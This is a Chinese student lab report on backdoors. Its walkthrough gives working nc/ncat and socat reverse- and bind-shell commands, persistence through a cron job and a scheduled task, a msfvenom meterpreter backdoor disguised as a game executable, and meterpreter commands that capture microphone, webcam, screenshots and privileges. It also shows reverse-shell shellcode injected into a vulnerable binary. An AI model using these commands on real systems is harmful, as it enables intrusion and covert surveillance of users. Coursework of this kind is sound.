欢迎来到网络对抗路 实验二 后门原理与实践

实验二 后门原理与实践

目录

• 实验二 后门原理与实践
  • 实验知识储备
  • Kali获取windows的shell
  • Windows获取Kali的shell
  • Meterpreter
  • Socat
  • MSF meterpreter
  • 使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权
  • 使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell。
  • 实验收获与感想
  • 问题回答

实验知识储备

1、什么是后门
概念：后门是指绕过安全控制而获取对程序或系统访问权的方法。
可能存在的位置：

• 编译器留后门
• 操作系统留后门
• 应用程序中留后门
• 潜伏于操作系统中或伪装为特定应用的专用后门程序。

后门满足以下几个特点：

• 特指潜伏于操作系统中专门做后门的一个程序
• 恶意攻击者可以连接这个程序
• 远程执行各种指令
• 概念和木马有重叠

2、常用后门工具

NC是一个底层工具，进行基本的TCP UDP数据收发。常被与其他工具结合使用，起到后门的作用。

• windows可以通过下载教学附件中的“ncat.rar”解压使用
• mac、linux自带nc，可以通过“man nc”查看使用说明

参数	描述
-g<网关>	设置路由器跃程通信网关，最多设置8个
-G<指向器数目>	设置来源路由指向器，其数值为4的倍数
-h	在线帮助
-i<延迟秒数>	设置时间间隔，以便传送信息及扫描通信端口
-l	使用监听模式，监控传入的资料
-n	直接使用ip地址，而不通过域名服务器
-o<输出文件>	指定文件名称，把往来传输的数据以16进制字码倾倒成该文件保存
-p<通信端口>	设置本地主机使用的通信端口
-r	指定源端口和目的端口都进行随机的选择
-s<来源位址>	设置本地主机送出数据包的IP地址
-u	使用UDP传输协议
-v	显示指令执行过程
-w	设置等待连线的时间
-z	使用0输入/输出模式，只在扫描通信端口时使用

Kali获取windows的shell

首先在Kali终端输入ifconfig查找IP地址

• linux输入nc -l -p 5308开启监听
• windows在cmd中输入./ncat.exe -e cmd.exe 192.168.118.136 5308反弹连接kali(这里是终端需要用./ncat，正常应该直接natcat）
• 此时回到kali，可以看到windows的cmd命令提示
  

Windows获取Kali的shell

• windows在cmd中输入ipconfig获取自身IP地址“172.16.228.223”
• windows在ncat文件夹中输入ncat.exe -l -p 5308开始监听
• kali输入nc 172.16.228.223 5308 -e /bin/sh反弹连接win
• 此时回到windows，可以发现打开了kali的shell，可以正常输入命令
  
  

Meterpreter

后门是一个程序，传统的理解是：有人编写一个后门程序，大家拿来用。更加系统的做法是编写一个能生成后门程序的平台，这个平台将后门各方面做成了可调整的参数，包括：

• 基本功能（基本的连接、执行指令）
• 扩展功能（如搜集用户信息、安装服务等功能）
• 编码模式
• 运行平台
• 运行参数
  典型的平台包括有：
• intersect
• Metaspolit的msfvenom指令
• Veil-evasion
  在我们本次实验中学习如何使用msfvenom生成后门可执行文件Meterpreter
  我们用到的命令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.118.136 LPORT=5317 -f exe > 20181208_backdoor.exe

1、启动cron
Cron是Linux下的定时任务，每一分钟运行一次，根据配置文件执行预设的指令。
Windows系统下监听端口5317，Linux系统下，输入指令crontab -e，并选择3进入编辑模式，在最后一行添加33 * * * * /bin/netcat 192.168.118.136 5317 -e /bin/sh，表示每个小时的第33分钟执行后面的那条指令。

linux在33分钟时连接Windows，这是一个反弹连接式后门，监听的windows连接后可获得shell。

2、使用nc传输数据
Windows下使用ncat.exe -l 5317监听5317端口，kali使用nc 192.168.118.136 5317反弹连接到Windows的5317端口，连接建立成功后双方可互传数据

3、使用nc传输文件
Windows下使用ncat.exe -l 5317 > mess.out监听5317端口，并把收到的数据保存到mess.out中
kali使用nc 192.168.0.102 5317 < mess.in反弹连接到Windows的5317端口，建立成功后，Windows可以收到kali发来的文件
可以在目录下找到mess.out，打开后可以看到内容与mess.in一致


将文件从Windows传给kali首先要将kali虚拟机的ssh服务端口打开，之后就只需使kali监听5317端口，Windows反弹连接kali的5317端口，建立成功后，kali可以收到Windows发来的文件。

Socat

1、首先下载socat，在老师给的附件里有，下载完成后打开计算机管理，在“任务计划程序”中“创建任务”，填写任务名并新建一个触发器。

在操作中的程序或脚本中选择你的socat.exe文件的路径，在添加参数一栏填写tcp-listen:5317 exec:cmd.exe,pty,stderr
这个命令的作用是把cmd.exe绑定到端口5317，同时把cmd.exe的stderr重定向到stdout上

新建一个触发器，选择按预定计划，其他设置自行设定
注销账户重新登陆后就可以看到任务已经在运行了

到达触发时间后任务自动运行

在kali输入指令socat - tcp:172.16.228.223:5317，连接到Windows主机的5317端口，此时可以获得Windows的shell

MSF meterpreter

使用MSF meterpreter生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell
使用kali攻击win10，首先在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.228.223 LPORT=5317 -f exe > Counter-Strike20181208.exe
注意这里的IP地址为控制端IP，即kali的IP，后门程序为Counter-Strike20181208.exe

在Windows下执行ncat.exe -lv 5317 > Counter-Strike20181208.exe指令，查看当前的连接状态

在kali中使用nc 172.16.228.223 5317 < Counter-Strike20181208.exe传输后门程序，传输成功win10的cmd中会出现传输信息

在Kali上使用msfconsole指令进入msf控制台

• 输入use exploit/multi/handler使用监听模块，设置payload
• set payload windows/meterpreter/reverse_tcp，使用和生成后门程序时相同的payload
• set LHOST 192.168.0.115，这里用的是生成后门程序时指定的IP
• set LPORT 5317，同样要使用相同的端口
  
  使用exploit开始监听，运行Windows中的后门程序
  在cmd中运行Windows下的后门程序，这时Kali上获得了Windows主机的shell，经测试可以使用

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

1、使用record_mic -d 5指令可以截获一段时长5s的音频，录制完毕会告诉你他的保存路径，打开后就可以发现这是来自未知艺术家的5秒音频QAQ
2、webcam_snap指令可以使用摄像头进行拍照，拍摄完毕桌面会出现一张JPEG图像，我将笔记本的摄像头驱动关掉了
3、获取击键记录
screenshot指令可以进行截屏


4、查看用户与提权
getuid指令可以查看当前用户，getsystem指令进行提权操作

使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell。

网站中搜索linux/x86 - Reverse下载了反弹连接的shellcode
之后像实验一一样做好环境配置，使用echo "0" > /proc/sys/kernel/randomize_va_space关闭地址随机化
使用如下命令使输出重定向>将perl生成的字符串存储到文件input_shellcode中
perl -e 'print "A" x 32;print"x31xc0x31xdbx31xc9x31xd2x66xb8x67x01xb3x02xb1x01xcdx80x89xc3xb8x80xffxffxfex83xf0xffx50x66x68x11x5cx66x6ax02x89xe1xb2x10x31xc0x66xb8x6ax01xcdx80x85xc0x75x24x31xc9xb1x02x31xc0xb0x3fxcdx80x49x79xf9x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x31xc9x31xd2xb0x0bxcdx80xb3x01x31xc0xb0x01xcdx80"' > input_shellcode
打开一个终端使用(cat input_shellcode;cat) | ./pwn1注入这段攻击buf
再开另外一个终端，用gdb来调试pwn1这个进程。输入ps -ef | grep pwn1找到pwn1的进程号
之后启动gdb使用attach调试这个进程。使用disassemble foo查看到ret的地址

0xffffd38c存放的数据是80cd01b0，那么shellcode地址就是0xffffd390，修改并生成input文件
perl -e 'print "A" x 32;print"x90xd3xffxffx31xc0x31xdbx31xc9x31xd2x66xb8x67x01xb3x02xb1x01xcdx80x89xc3xb8x80xffxffxfex83xf0xffx50x66x68x11x5cx66x6ax02x89xe1xb2x10x31xc0x66xb8x6ax01xcdx80x85xc0x75x24x31xc9xb1x02x31xc0xb0x3fxcdx80x49x79xf9x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x31xc9x31xd2xb0x0bxcdx80xb3x01x31xc0xb0x01xcdx80"' > input
打开msf控制台依次输入
use exploit/multi/handler，用于设置payload
set payload linux/x86/shell_reverse_tcp
set LHOST 127.0.0.1，设置IP为回环地址
set LPORT 4444，根据代码设置端口
exploit ，设置完成开始监听
使用(cat input;cat) | ./pwn1将input输入，通过管道符“|”，作为pwn1的输入。
这时在msf控制台可以看到已经成功调取了shell

实验收获与感想

通过本次实验使我对后门有了更加深刻的认识，能从自己的设备上获取摄像头麦克风和键入信息还是蛮可怕的！

问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式？
从第三方网站安装软件（使用陌生人给的U盘并打开里面的文件）

(2)例举你知道的后门如何启动起来(win及linux)的方式？
捆绑到某应用程序或添加到启动项；设定某条件，达到条件激活后门打开，比如本实验中的socat

(3)Meterpreter有哪些给你映像深刻的功能？
在电脑用户不知情的情况下获取计算机的键入情况，麦克风的使用情况与截屏……用户的键入情况被窃取可能会带来信息的泄露，会造成用户隐私以及重要数据外泄。

(4)如何发现自己有系统有没有被安装后门？
最简单的方法是使用杀毒软件查杀，开启监控并及时更新病毒库。
其次查看自己计算机的端口开放情况，关闭多余的端口
查看注册表和启动项，清除可疑进程